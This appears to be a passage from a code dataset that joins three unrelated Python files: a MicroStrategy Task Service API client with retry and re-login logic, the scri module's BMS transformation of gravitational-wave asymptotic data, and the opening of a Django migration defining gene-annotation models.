out of memory stack trace) the returned list is empty
Args:
attribute_id (str): the attribute guid
Returns:
list: a list of strings containing the names for attribute values
"""
arguments = {'taskId': 'browseElements',
'attributeID': attribute_id,
'sessionState': self._session}
response = self.request(arguments)
result = []
for attr in response('block'):
if attr.find('n').string:
result.append(attr.find('n').string)
return result
def check_user_privileges(self, privilege_types: Set[PrivilegeTypes]=None) -> dict:
if privilege_types is None:
privilege_types = {PrivilegeTypes.WebExecuteAnalysis}
arguments = {'taskId': 'checkUserPrivileges',
'privilegeTypes': privilege_types,
'sessionState': self._session}
response = self.request(arguments)
priv_dict = dict()
priv_entries = response.find_all('privilege')
for privilege in priv_entries:
priv = privilege['type']
try:
priv = int(priv)
if priv in PrivilegeTypesIDDict:
priv = PrivilegeTypesIDDict[priv]
except ValueError:
pass
value = privilege['value']
if value == '1':
value = True
elif value == '0':
value = False
else:
raise ValueError("Priv value {} is not valid in {}".format(value, priv_entries))
priv_dict[priv] = value
return priv_dict
def get_user_info(self):
profile_objects = self.get_folder_contents_by_guid(system_folder=TaskProc.SystemFolders.ProfileObjects)
profile_first_object = profile_objects[0]
profile_name = profile_first_object.path[-1]
# For example <NAME> (jadams)
full_name, user_id = profile_name.split('(', 1)
user_id = user_id[:-1]
return full_name, user_id
def get_attribute(self, attribute_id):
"""
Returns the attribute object for the given attribute id.
Args:
attribute_id (str): the attribute guid
Returns:
Attribute: Attribute object for this guid
Raises:
MstrClientException: if no attribute id is supplied
"""
if not attribute_id:
raise MstrClientException("You must provide an attribute id")
arguments = {'taskId': 'getAttributeForms',
'attributeID': attribute_id,
'sessionState': self._session
}
response = self.request(arguments)
return Attribute(response.find('dssid').string, response.find('n').string)
def logout(self):
arguments = {
'taskId': 'logout',
'sessionState': self._session,
}
arguments.update(BASE_PARAMS)
try:
result = self.request(arguments, max_retries=0)
except Exception as e:
result = str(e)
self._session = None
if self.trace:
self.log.debug("logging out returned %s" % result)
def request(self, arguments: dict, max_retries: int = None) -> BeautifulSoup:
"""
Assembles the url and performs a get request to
the MicroStrategy Task Service API
        Arguments
---------
arguments:
Maps get key parameters to values
max_retries:
            Optional. Number of retries to allow. Defaults to self.max_retries.
Returns:
The xml response as a BeautifulSoup 4 object.
"""
if max_retries is None:
max_retries = self.max_retries
arguments.update(BASE_PARAMS)
for arg_name, arg_value in arguments.items():
if isinstance(arg_value, str):
pass
elif isinstance(arg_value, Enum):
arguments[arg_name] = str(arg_value.value)
elif isinstance(arg_value, BitSet):
arguments[arg_name] = arg_value.combine()
elif isinstance(arg_value, list) or isinstance(arg_value, set):
if len(arg_value) == 0:
arguments[arg_name] = ''
elif isinstance(list(arg_value)[0], Enum):
new_arg_value = set()
for arg_sub_value in arg_value:
if isinstance(arg_sub_value, Enum):
new_arg_value.add(str(arg_sub_value.value))
else:
new_arg_value.add(str(arg_sub_value))
arg_value = new_arg_value
arguments[arg_name] = ','.join(arg_value)
else:
arguments[arg_name] = str(arg_value)
if self.trace:
self.log.debug("arguments {}".format(arguments))
request = self._base_url + urllib.parse.urlencode(arguments)
if self.trace:
self.log.debug("submitting request {}".format(request))
result_bs4 = None
done = False
tries = 0
exception = None
while not done:
try:
response = requests.get(request, cookies=self.cookies)
if self.trace:
self.log.debug(f"received response {response}")
if response.status_code != 200:
exception = MstrClientException(
msg=f"Server response {response}.",
request=request
)
else:
self.cookies = response.cookies
result_bs4 = BeautifulSoup(response.text, 'xml')
task_response = result_bs4.find('taskResponse')
if task_response is None:
self.log.error(response)
self.log.error(task_response)
error = f"Unexpected server response with no taskResponse tag {result_bs4.prettify()}"
exception = MstrClientException(
msg=f"Server error '{error}'",
request=request
)
else:
if task_response.attrs is None or 'statusCode' not in task_response.attrs:
self.log.error(response)
self.log.error(task_response)
error = f"Unexpected server response with no statusCode in taskResponse tag {task_response}"
exception = MstrClientException(
msg=f"Server error '{error}'",
request=request
)
else:
if task_response['statusCode'] in ['400', '500']:
self.log.error(response)
self.log.error(task_response)
error = task_response['errorMsg']
exception = MstrClientException(
msg=f"Server error '{error}'",
request=request
)
except requests.packages.urllib3.exceptions.NewConnectionError as e:
exception = e
if exception is None:
done = True
else:
                error = getattr(exception, 'msg', str(exception))
messages_to_retry = self._messages_to_retry
time.sleep(1)
if isinstance(exception, requests.packages.urllib3.exceptions.NewConnectionError):
if tries < max_retries:
self.log.info("Request failed with error {}".format(repr(exception)))
time.sleep(self.retry_delay)
self.log.info("Retrying. Tries={} < {} max".format(tries, max_retries))
                        # Count these as 1/300 of a try (allows several minutes of retries) for each max_retries
tries += (1/300)
else:
self.log.error('. Tries limit {} reached'.format(tries))
raise exception
elif 'automatically logged out' in error:
if tries < max_retries:
tries += 1
# We can't re-login if we don't have a username (ie. we authenticated with a session_state value)
if self.username is not None:
self.log.info("Request failed with error {}".format(repr(exception)))
time.sleep(self.retry_delay)
self.log.info("Logging back in. Tries= {} < {} max".format(tries, max_retries))
try:
self.logout()
except MstrClientException:
pass
self.login()
else:
exception.msg += '. Re-login not possible without username.'
raise exception
else:
self.log.error('. Tries limit {} reached'.format(tries))
raise exception
elif any(regex_pattern.match(error) for regex_pattern in messages_to_retry):
if tries < max_retries:
self.log.info("Request failed with error {}".format(repr(exception)))
time.sleep(self.retry_delay)
self.log.info("Retrying. Tries={} < {} max".format(tries, max_retries))
tries += 1
else:
self.log.error('. Tries limit {} reached'.format(tries))
raise exception
else:
self.log.debug("Request failed with error {}".format(repr(exception)))
raise exception
return result_bs4
def get_task_client_from_config(config, config_section) -> TaskProc:
task_url = config[config_section]['task_url'].strip()
server = config[config_section]['server_name'].strip()
project = config[config_section]['project'].strip()
user_id = config[config_section]['user_id']
password = config[config_section].get('password')
if password is None:
keyring_section = config[config_section]['keyring_section'].strip()
try:
import keyring
password = keyring.get_password(keyring_section, user_id)
except ImportError:
raise ValueError("Password not provided and keyring not installed")
concurrent_max = config[config_section].get('concurrent_max', 10)
max_retries = config[config_section].get('max_retries', 10)
retry_delay = config[config_section].get('retry_delay', 10)
return TaskProc(
base_url=task_url,
server=server,
project_name=project,
username=user_id,
password=password,
concurrent_max=concurrent_max,
max_retries=max_retries,
retry_delay=retry_delay,
) | StarcoderdataPython |
1744788 | <reponame>markscheel/scri<gh_stars>10-100
import math
import numpy as np
import quaternion
import spinsfast
import spherical_functions as sf
def _process_transformation_kwargs(input_ell_max, **kwargs):
original_kwargs = kwargs.copy()
# Build the supertranslation and spacetime_translation arrays
supertranslation = np.zeros((4,), dtype=complex) # For now; may be resized below
ell_max_supertranslation = 1 # For now; may be increased below
if "supertranslation" in kwargs:
supertranslation = np.array(kwargs.pop("supertranslation"), dtype=complex)
if supertranslation.dtype != "complex" and supertranslation.size > 0:
# I don't actually think this can ever happen...
raise TypeError(
"Input argument `supertranslation` should be a complex array with size>0. "
f"Got a {supertranslation.dtype} array of shape {supertranslation.shape}"
)
# Make sure the array has size at least 4, by padding with zeros
if supertranslation.size <= 4:
supertranslation = np.lib.pad(
supertranslation, (0, 4 - supertranslation.size), "constant", constant_values=(0.0,)
)
# Check that the shape is a possible array of scalar modes with complete (ell,m) data
ell_max_supertranslation = int(np.sqrt(len(supertranslation))) - 1
if (ell_max_supertranslation + 1) ** 2 != len(supertranslation):
raise ValueError(
"Input supertranslation parameter must contain modes from ell=0 up to some ell_max, "
"including\n all relevant m modes in standard order (see `spherical_functions` "
"documentation for details).\n Thus, it must be an array with length given by a "
"perfect square; its length is {len(supertranslation)}"
)
# Check that the resulting supertranslation will be real
for ell in range(ell_max_supertranslation + 1):
for m in range(ell + 1):
i_pos = sf.LM_index(ell, m, 0)
i_neg = sf.LM_index(ell, -m, 0)
a = supertranslation[i_pos]
b = supertranslation[i_neg]
if abs(a - (-1.0) ** m * b.conjugate()) > 3e-16 + 1e-15 * abs(b):
raise ValueError(
f"\nsupertranslation[{i_pos}]={a} # (ell,m)=({ell},{m})\n"
+ "supertranslation[{}]={} # (ell,m)=({},{})\n".format(i_neg, b, ell, -m)
+ "Will result in an imaginary supertranslation."
)
spacetime_translation = np.zeros((4,), dtype=float)
spacetime_translation[0] = sf.constant_from_ell_0_mode(supertranslation[0]).real
spacetime_translation[1:4] = -sf.vector_from_ell_1_modes(supertranslation[1:4]).real
if "spacetime_translation" in kwargs:
st_trans = np.array(kwargs.pop("spacetime_translation"), dtype=float)
if st_trans.shape != (4,) or st_trans.dtype != "float":
raise TypeError(
"\nInput argument `spacetime_translation` should be a float array of shape (4,).\n"
"Got a {} array of shape {}.".format(st_trans.dtype, st_trans.shape)
)
spacetime_translation = st_trans[:]
supertranslation[0] = sf.constant_as_ell_0_mode(spacetime_translation[0])
supertranslation[1:4] = sf.vector_as_ell_1_modes(-spacetime_translation[1:4])
if "space_translation" in kwargs:
s_trans = np.array(kwargs.pop("space_translation"), dtype=float)
if s_trans.shape != (3,) or s_trans.dtype != "float":
raise TypeError(
"\nInput argument `space_translation` should be an array of floats of shape (3,).\n"
"Got a {} array of shape {}.".format(s_trans.dtype, s_trans.shape)
)
spacetime_translation[1:4] = s_trans[:]
supertranslation[1:4] = sf.vector_as_ell_1_modes(-spacetime_translation[1:4])
if "time_translation" in kwargs:
t_trans = kwargs.pop("time_translation")
if not isinstance(t_trans, float):
raise TypeError("Input argument `time_translation` should be a single float. " f"Got {t_trans}")
spacetime_translation[0] = t_trans
supertranslation[0] = sf.constant_as_ell_0_mode(spacetime_translation[0])
# Decide on the number of points to use in each direction. A nontrivial supertranslation will
# introduce power in higher modes, so for best accuracy, we need to account for that. But we'll
# make it a firm requirement to have enough points to capture the original waveform, at least
output_ell_max = kwargs.pop("output_ell_max", input_ell_max)
working_ell_max = kwargs.pop("working_ell_max", 2 * input_ell_max + ell_max_supertranslation)
if working_ell_max < input_ell_max:
raise ValueError(f"working_ell_max={working_ell_max} is too small; it must be at least ell_max={input_ell_max}")
# Get the rotor for the frame rotation
frame_rotation = np.quaternion(*np.array(kwargs.pop("frame_rotation", [1, 0, 0, 0]), dtype=float))
if frame_rotation.abs() < 3e-16:
raise ValueError(f"frame_rotation={frame_rotation} should be a single unit quaternion")
frame_rotation = frame_rotation.normalized()
# Get the boost velocity vector
boost_velocity = np.array(kwargs.pop("boost_velocity", [0.0] * 3), dtype=float)
beta = np.linalg.norm(boost_velocity)
if boost_velocity.dtype != float or boost_velocity.shape != (3,) or beta >= 1.0:
raise ValueError(
f"Input boost_velocity=`{boost_velocity}` should be a 3-vector with " "magnitude strictly less than 1.0"
)
return frame_rotation, boost_velocity, supertranslation, working_ell_max, output_ell_max
def boosted_grid(frame_rotation, boost_velocity, n_theta, n_phi):
beta = np.linalg.norm(boost_velocity)
gamma = 1 / math.sqrt(1 - beta ** 2)
rapidity = math.atanh(beta)
# Construct the function that modifies our rotor grid to account for the boost
if beta > 3e-14: # Tolerance for beta; any smaller and numerical errors will have greater effect
vhat = boost_velocity / beta
def Bprm_j_k(thetaprm, phiprm):
"""Construct rotor taking r' to r
I derived this result in a different way, but I've also found it described in
Penrose-Rindler Vol. 1, around Eq. (1.3.5). Note, however, that their discussion is for
the past celestial sphere, so there's a sign difference.
"""
# Note: It doesn't matter which we use -- r' or r; all we need is the direction of the
# bivector spanned by v and r', which is the same as the direction of the bivector
# spanned by v and r, since either will be normalized, and one cross product is zero iff
# the other is zero.
rprm = np.array(
[math.cos(phiprm) * math.sin(thetaprm), math.sin(phiprm) * math.sin(thetaprm), math.cos(thetaprm)]
)
Thetaprm = math.acos(np.dot(vhat, rprm))
Theta = 2 * math.atan(math.exp(-rapidity) * math.tan(Thetaprm / 2.0))
rprm_cross_vhat = np.quaternion(0.0, *np.cross(rprm, vhat))
if rprm_cross_vhat.abs() > 1e-200:
return (rprm_cross_vhat.normalized() * (Thetaprm - Theta) / 2).exp()
else:
return quaternion.one
else:
def Bprm_j_k(thetaprm, phiprm):
return quaternion.one
# These are the angles in the transformed system at which we need to know the function values
thetaprm_phiprm = sf.theta_phi(n_theta, n_phi)
# Set up rotors that we can use to evaluate the SWSHs in the original frame
R_j_k = np.empty((n_theta, n_phi), dtype=np.quaternion)
for j in range(n_theta):
for k in range(n_phi):
thetaprm_j, phiprm_k = thetaprm_phiprm[j, k]
R_j_k[j, k] = (
Bprm_j_k(thetaprm_j, phiprm_k) * frame_rotation * quaternion.from_spherical_coords(thetaprm_j, phiprm_k)
)
return R_j_k
def conformal_factors(boost_velocity, distorted_grid_rotors):
"""Compute various combinations of the conformal factor
This is primarily a utility function for use in the `transform` function, pulled out so that it
can be tested separately.
Parameters
==========
boost_velocity: array of 3 floats
Three-velocity of the new frame relative to the old frame
distorted_grid_rotors: 2-d array of quaternions
Unit quaternions giving the rotation of the (x, y, z) basis onto the basis vectors with
respect to which the output spin-weighted fields are evaluated
Returns
=======
k: spherical_functions.Grid
ðk_over_k: spherical_functions.Grid
one_over_k: spherical_functions.Grid
one_over_k_cubed: spherical_functions.Grid
These all have the same shape as `distorted_grid_rotors` except for an additional dimension
of size 1 at the beginning, so that they can broadcast against the time dimension.
"""
from quaternion import rotate_vectors
β = np.linalg.norm(boost_velocity)
γ = 1 / math.sqrt(1 - β ** 2)
# Note that ðk / k = ð(v·r) / (1 - v·r), but evaluating ð(v·r) is slightly delicate. As modes
# in the undistorted frame, we have ð(v·r) ~ (v·r), but the right hand side is now an s=1 field,
# so it has to be evaluated as such.
v_dot_r = sf.Grid(np.dot(rotate_vectors(distorted_grid_rotors, quaternion.z.vec), boost_velocity), spin_weight=0)[
np.newaxis, :, :
]
ðv_dot_r = sf.Grid(
sf.Modes(np.insert(sf.vector_as_ell_1_modes(boost_velocity), 0, 0.0), spin_weight=1).evaluate(
distorted_grid_rotors
),
spin_weight=1,
)[np.newaxis, :, :]
one_over_k = γ * (1 - v_dot_r)
k = 1.0 / one_over_k
ðk_over_k = ðv_dot_r / (1 - v_dot_r)
one_over_k_cubed = one_over_k ** 3
return k, ðk_over_k, one_over_k, one_over_k_cubed
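# Illustrative sketch (not part of the original module): for the special case of a boost
# along +z, the factors above reduce to the closed form k(theta) = 1 / (gamma * (1 - beta*cos(theta))),
# since v.r = beta*cos(theta) on the unit sphere.  The helper name is ours; it assumes only
# `math` and `numpy` (np), which are already used throughout this module.
def _k_boost_along_z_sketch(beta, theta):
    """Closed-form conformal factor for a boost of speed `beta` along +z."""
    gamma = 1 / math.sqrt(1 - beta ** 2)
    return 1.0 / (gamma * (1 - beta * np.cos(theta)))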
def transform(self, **kwargs):
"""Apply BMS transformation to AsymptoticBondiData object
It is important to note that the input transformation parameters are applied in this order:
1. (Super)Translations
2. Rotation (about the origin)
3. Boost (about the origin)
All input parameters refer to the transformation required to take the input data's inertial
frame onto the inertial frame of the output data's inertial observers. In what follows, the
coordinates of and functions in the input inertial frame will be unprimed, while corresponding
values of the output inertial frame will be primed.
The translations (space, time, spacetime, or super) can be given in various ways, which may
override each other. Ultimately, however, they are essentially combined into a single function
`α`, representing the supertranslation, which transforms the asymptotic time variable `u` as
u'(u, θ, ϕ) = u(u, θ, ϕ) - α(θ, ϕ)
A simple time translation by δt would correspond to
α(θ, ϕ) = δt # Independent of (θ, ϕ)
A pure spatial translation δx would correspond to
α(θ, ϕ) = -δx · n̂(θ, ϕ)
where `·` is the usual dot product, and `n̂` is the unit vector in the given direction.
Parameters
==========
abd: AsymptoticBondiData
The object storing the modes of the original data, which will be transformed in this
function. This is the only required argument to this function.
time_translation: float, optional
Defaults to zero. Nonzero overrides corresponding components of `spacetime_translation` and
`supertranslation` parameters. Note that this is the actual change in the coordinate value,
rather than the corresponding mode weight (which is what `supertranslation` represents).
space_translation : float array of length 3, optional
Defaults to empty (no translation). Non-empty overrides corresponding components of
`spacetime_translation` and `supertranslation` parameters. Note that this is the actual
change in the coordinate value, rather than the corresponding mode weight (which is what
`supertranslation` represents).
spacetime_translation : float array of length 4, optional
Defaults to empty (no translation). Non-empty overrides corresponding components of
`supertranslation`. Note that this is the actual change in the coordinate value, rather
than the corresponding mode weight (which is what `supertranslation` represents).
supertranslation : complex array [defaults to 0]
This gives the complex components of the spherical-harmonic expansion of the
supertranslation in standard form, starting from ell=0 up to some ell_max, which may be
different from the ell_max of the input `abd` object. Supertranslations must be real, so
these values should obey the condition
α^{ℓ,m} = (-1)^m ᾱ^{ℓ,-m}
This condition is actually imposed on the input data, so imaginary parts of α(θ, ϕ) will
essentially be discarded. Defaults to empty, which causes no supertranslation. Note that
some components may be overridden by the parameters above.
frame_rotation : quaternion [defaults to 1]
Transformation applied to (x,y,z) basis of the input mode's inertial frame. For example,
the basis z vector of the new frame may be written as
z' = frame_rotation * z * frame_rotation.inverse()
Defaults to 1, corresponding to the identity transformation (no rotation).
boost_velocity : float array of length 3 [defaults to (0, 0, 0)]
This is the three-velocity vector of the new frame relative to the input frame. The norm of
this vector is required to be smaller than 1.
output_ell_max: int [defaults to abd.ell_max]
Maximum ell value in the output data.
working_ell_max: int [defaults to 2 * abd.ell_max]
Maximum ell value to use during the intermediate calculations. Rotations and time
translations do not require this to be any larger than abd.ell_max, but other
transformations will require more values of ell for accurate results. In particular, boosts
are multiplied by time, meaning that a large boost of data with large values of time will
lead to very large power in higher modes. Similarly, large (super)translations will couple
            power into many higher modes. To avoid aliasing, this value should be large enough to accommodate
power in higher modes.
Returns
-------
abdprime: AsymptoticBondiData
Object representing the transformed data.
"""
from quaternion import rotate_vectors
from scipy.interpolate import CubicSpline
# Parse the input arguments, and define the basic parameters for this function
(
frame_rotation,
boost_velocity,
supertranslation,
working_ell_max,
output_ell_max,
) = _process_transformation_kwargs(self.ell_max, **kwargs)
n_theta = 2 * working_ell_max + 1
n_phi = n_theta
β = np.linalg.norm(boost_velocity)
γ = 1 / math.sqrt(1 - β ** 2)
# Make this into a Modes object, so it can keep track of its spin weight, etc., through the
# various operations needed below.
supertranslation = sf.Modes(supertranslation, spin_weight=0).real
# This is a 2-d array of unit quaternions, which are what the spin-weighted functions should be
# evaluated on (even for spin 0 functions, for simplicity). That will be equivalent to
# evaluating the spin-weighted functions with respect to the transformed grid -- although on the
# original time slices.
distorted_grid_rotors = boosted_grid(frame_rotation, boost_velocity, n_theta, n_phi)
# Compute u, α, ðα, ððα, k, ðk/k, 1/k, and 1/k³ on the distorted grid, including new axes to
# enable broadcasting with time-dependent functions. Note that the first axis should represent
# variation in u, the second axis variation in θ', and the third axis variation in ϕ'.
u = self.u
α = sf.Grid(supertranslation.evaluate(distorted_grid_rotors), spin_weight=0).real[np.newaxis, :, :]
# The factors of 1/sqrt(2) and 1/2 come from using the GHP eth instead of the NP eth.
ðα = sf.Grid(supertranslation.eth.evaluate(distorted_grid_rotors) / np.sqrt(2), spin_weight=α.s + 1)[np.newaxis, :, :]
ððα = sf.Grid(0.5 * supertranslation.eth.eth.evaluate(distorted_grid_rotors), spin_weight=α.s + 2)[np.newaxis, :, :]
k, ðk_over_k, one_over_k, one_over_k_cubed = conformal_factors(boost_velocity, distorted_grid_rotors)
# ðu'(u, θ', ϕ') exp(iλ) / k(θ', ϕ')
ðuprime_over_k = ðk_over_k * (u - α) - ðα
# ψ0(u, θ', ϕ') exp(2iλ)
ψ0 = sf.Grid(self.psi0.evaluate(distorted_grid_rotors), spin_weight=2)
# ψ1(u, θ', ϕ') exp(iλ)
ψ1 = sf.Grid(self.psi1.evaluate(distorted_grid_rotors), spin_weight=1)
# ψ2(u, θ', ϕ')
ψ2 = sf.Grid(self.psi2.evaluate(distorted_grid_rotors), spin_weight=0)
# ψ3(u, θ', ϕ') exp(-1iλ)
ψ3 = sf.Grid(self.psi3.evaluate(distorted_grid_rotors), spin_weight=-1)
# ψ4(u, θ', ϕ') exp(-2iλ)
ψ4 = sf.Grid(self.psi4.evaluate(distorted_grid_rotors), spin_weight=-2)
# σ(u, θ', ϕ') exp(2iλ)
σ = sf.Grid(self.sigma.evaluate(distorted_grid_rotors), spin_weight=2)
### The following calculations are done using in-place Horner form. I suspect this will be the
### most efficient form of this calculation, within reason. Note that the factors of exp(isλ)
### were computed automatically by evaluating in terms of quaternions.
#
fprime_of_timenaught_directionprime = np.empty((6, self.n_times, n_theta, n_phi), dtype=complex)
# ψ0'(u, θ', ϕ')
fprime_temp = ψ4.copy()
fprime_temp *= ðuprime_over_k
fprime_temp += -4 * ψ3
fprime_temp *= ðuprime_over_k
fprime_temp += 6 * ψ2
fprime_temp *= ðuprime_over_k
fprime_temp += -4 * ψ1
fprime_temp *= ðuprime_over_k
fprime_temp += ψ0
fprime_temp *= one_over_k_cubed
fprime_of_timenaught_directionprime[0] = fprime_temp
# ψ1'(u, θ', ϕ')
fprime_temp = -ψ4
fprime_temp *= ðuprime_over_k
fprime_temp += 3 * ψ3
fprime_temp *= ðuprime_over_k
fprime_temp += -3 * ψ2
fprime_temp *= ðuprime_over_k
fprime_temp += ψ1
fprime_temp *= one_over_k_cubed
fprime_of_timenaught_directionprime[1] = fprime_temp
# ψ2'(u, θ', ϕ')
fprime_temp = ψ4.copy()
fprime_temp *= ðuprime_over_k
fprime_temp += -2 * ψ3
fprime_temp *= ðuprime_over_k
fprime_temp += ψ2
fprime_temp *= one_over_k_cubed
fprime_of_timenaught_directionprime[2] = fprime_temp
# ψ3'(u, θ', ϕ')
fprime_temp = -ψ4
fprime_temp *= ðuprime_over_k
fprime_temp += ψ3
fprime_temp *= one_over_k_cubed
fprime_of_timenaught_directionprime[3] = fprime_temp
# ψ4'(u, θ', ϕ')
fprime_temp = ψ4.copy()
fprime_temp *= one_over_k_cubed
fprime_of_timenaught_directionprime[4] = fprime_temp
# σ'(u, θ', ϕ')
fprime_temp = σ.copy()
fprime_temp -= ððα
fprime_temp *= one_over_k
fprime_of_timenaught_directionprime[5] = fprime_temp
# Determine the new time slices. The set timeprime is chosen so that on each slice of constant
# u'_i, the average value of u=(u'/k)+α is precisely <u>=u'γ+<α>=u_i. But then, we have to
    # narrow that set down, so that every grid point on all the u'_i slices corresponds to data in
# the range of input data.
timeprime = (u - sf.constant_from_ell_0_mode(supertranslation[0]).real) / γ
timeprime_of_initialtime_directionprime = k * (u[0] - α)
timeprime_of_finaltime_directionprime = k * (u[-1] - α)
earliest_complete_timeprime = np.max(timeprime_of_initialtime_directionprime.view(np.ndarray))
latest_complete_timeprime = np.min(timeprime_of_finaltime_directionprime.view(np.ndarray))
timeprime = timeprime[(timeprime >= earliest_complete_timeprime) & (timeprime <= latest_complete_timeprime)]
# This will store the values of f'(u', θ', ϕ') for the various functions `f`
fprime_of_timeprime_directionprime = np.zeros((6, timeprime.size, n_theta, n_phi), dtype=complex)
# Interpolate the various transformed function values on the transformed grid from the original
# time coordinate to the new set of time coordinates, independently for each direction.
for i in range(n_theta):
for j in range(n_phi):
k_i_j = k[0, i, j]
α_i_j = α[0, i, j]
# u'(u, θ', ϕ')
timeprime_of_timenaught_directionprime_i_j = k_i_j * (u - α_i_j)
# f'(u', θ', ϕ')
fprime_of_timeprime_directionprime[:, :, i, j] = CubicSpline(
timeprime_of_timenaught_directionprime_i_j, fprime_of_timenaught_directionprime[:, :, i, j], axis=1
)(timeprime)
# Finally, transform back from the distorted grid to the SWSH mode weights as measured in that
# grid. I'll abuse notation slightly here by indicating those "distorted" mode weights with
# primes, so that f'(u')_{ℓ', m'} = ∫ f'(u', θ', ϕ') sȲ_{ℓ', m'}(θ', ϕ') sin(θ') dθ' dϕ'
abdprime = type(self)(timeprime, output_ell_max)
# ψ0'(u')_{ℓ', m'}
abdprime.psi0 = spinsfast.map2salm(fprime_of_timeprime_directionprime[0], 2, output_ell_max)
# ψ1'(u')_{ℓ', m'}
abdprime.psi1 = spinsfast.map2salm(fprime_of_timeprime_directionprime[1], 1, output_ell_max)
# ψ2'(u')_{ℓ', m'}
abdprime.psi2 = spinsfast.map2salm(fprime_of_timeprime_directionprime[2], 0, output_ell_max)
# ψ3'(u')_{ℓ', m'}
abdprime.psi3 = spinsfast.map2salm(fprime_of_timeprime_directionprime[3], -1, output_ell_max)
# ψ4'(u')_{ℓ', m'}
abdprime.psi4 = spinsfast.map2salm(fprime_of_timeprime_directionprime[4], -2, output_ell_max)
# σ'(u')_{ℓ', m'}
abdprime.sigma = spinsfast.map2salm(fprime_of_timeprime_directionprime[5], 2, output_ell_max)
return abdprime
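# Usage sketch (illustrative, not part of the original module).  The keyword arguments
# match the parameters documented in `transform` above; `abd` stands for any existing
# AsymptoticBondiData instance and is an assumption of the example.
def _transform_usage_sketch(abd):
    """Apply a small example BMS transformation and return the transformed data."""
    return abd.transform(
        time_translation=10.0,                # shift u by 10 (retarded-time units)
        frame_rotation=[1, 0, 0, 0],          # identity rotation
        boost_velocity=[0.0, 0.0, 1e-4],      # small boost along +z, |v| < 1
        output_ell_max=abd.ell_max,
    )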
# Generated by Django 3.1 on 2020-09-29 05:33
import django.db.models.deletion
import django_extensions.db.fields
from django.conf import settings
from django.db import migrations, models
import library.django_utils
import library.utils
class Migration(migrations.Migration):
initial = True
dependencies = [
('annotation', '0001_initial'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('snpdb', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='CanonicalTranscriptCollection',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', django_extensions.db.fields.CreationDateTimeField(auto_now_add=True, verbose_name='created')),
('modified', django_extensions.db.fields.ModificationDateTimeField(auto_now=True, verbose_name='modified')),
('description', models.TextField(blank=True)),
('filename', models.TextField(blank=True)),
('annotation_consortium', models.CharField(choices=[('R', 'RefSeq'), ('E', 'Ensembl')], max_length=1)),
('file_md5sum', models.TextField()),
('genome_build', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='snpdb.genomebuild')),
],
options={
'get_latest_by': 'modified',
'abstract': False,
},
),
migrations.CreateModel(
name='Gene',
fields=[
('identifier', models.TextField(primary_key=True, serialize=False)),
('annotation_consortium', models.CharField(choices=[('R', 'RefSeq'), ('E', 'Ensembl')], max_length=1)),
],
),
migrations.CreateModel(
name='GeneAnnotationImport',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', django_extensions.db.fields.CreationDateTimeField(auto_now_add=True, verbose_name='created')),
('modified', django_extensions.db.fields.ModificationDateTimeField(auto_now=True, verbose_name='modified')),
('annotation_consortium', models.CharField(choices=[('R', 'RefSeq'), ('E', 'Ensembl')], max_length=1)),
('filename', models.TextField()),
('genome_build', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='snpdb.genomebuild')),
],
options={
'get_latest_by': 'modified',
'abstract': False,
},
),
migrations.CreateModel(
name='GeneAnnotationRelease',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('version', models.IntegerField()),
('annotation_consortium', models.CharField(choices=[('R', 'RefSeq'), ('E', 'Ensembl')], max_length=1)),
('gene_annotation_import', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='genes.geneannotationimport')),
('genome_build', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='snpdb.genomebuild')),
],
options={
'unique_together': {('version', 'annotation_consortium', 'genome_build')},
},
),
migrations.CreateModel(
name='GeneList',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.TextField()),
('import_status', models.CharField(choices=[('C', 'created'), ('I', 'importing'), ('R', 'Requires user input'), ('E', 'error'), ('S', 'success'), ('M', 'Marked For Deletion'), ('D', 'Deleting')], default='C', max_length=1)),
('error_message', models.TextField(blank=True, null=True)),
('locked', models.BooleanField(default=False)),
('url', models.TextField(blank=True, null=True)),
],
),
migrations.CreateModel(
name='GeneSymbol',
fields=[
('symbol', models.TextField(primary_key=True, serialize=False)),
],
),
migrations.CreateModel(
name='GeneVersion',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('version', models.IntegerField()),
('description', models.TextField(null=True)),
('biotype', models.TextField(null=True)),
('gene', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='genes.gene')),
('gene_symbol', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='genes.genesymbol')),
('genome_build', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='snpdb.genomebuild')),
],
),
migrations.CreateModel(
name='HGNCGeneNamesImport',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', django_extensions.db.fields.CreationDateTimeField(auto_now_add=True, verbose_name='created')),
('modified', django_extensions.db.fields.ModificationDateTimeField(auto_now=True, verbose_name='modified')),
],
options={
'get_latest_by': 'modified',
'abstract': False,
},
),
migrations.CreateModel(
name='PanelAppPanel',
fields=[
('panel_id', models.TextField(primary_key=True, serialize=False)),
('disease_group', models.TextField()),
('disease_sub_group', models.TextField()),
('name', models.TextField()),
('current_version', models.TextField()),
('cached_web_resource', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='annotation.cachedwebresource')),
],
),
migrations.CreateModel(
name='Pfam',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('pfam_id', models.TextField(unique=True)),
('description', models.TextField()),
],
),
migrations.CreateModel(
name='PfamSequence',
fields=[
('seq_id', models.TextField(primary_key=True, serialize=False)),
],
),
migrations.CreateModel(
name='ProteinDomain',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.TextField(unique=True)),
('description', models.TextField()),
],
),
migrations.CreateModel(
name='ReleaseGeneSymbol',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', django_extensions.db.fields.CreationDateTimeField(auto_now_add=True, verbose_name='created')),
('modified', django_extensions.db.fields.ModificationDateTimeField(auto_now=True, verbose_name='modified')),
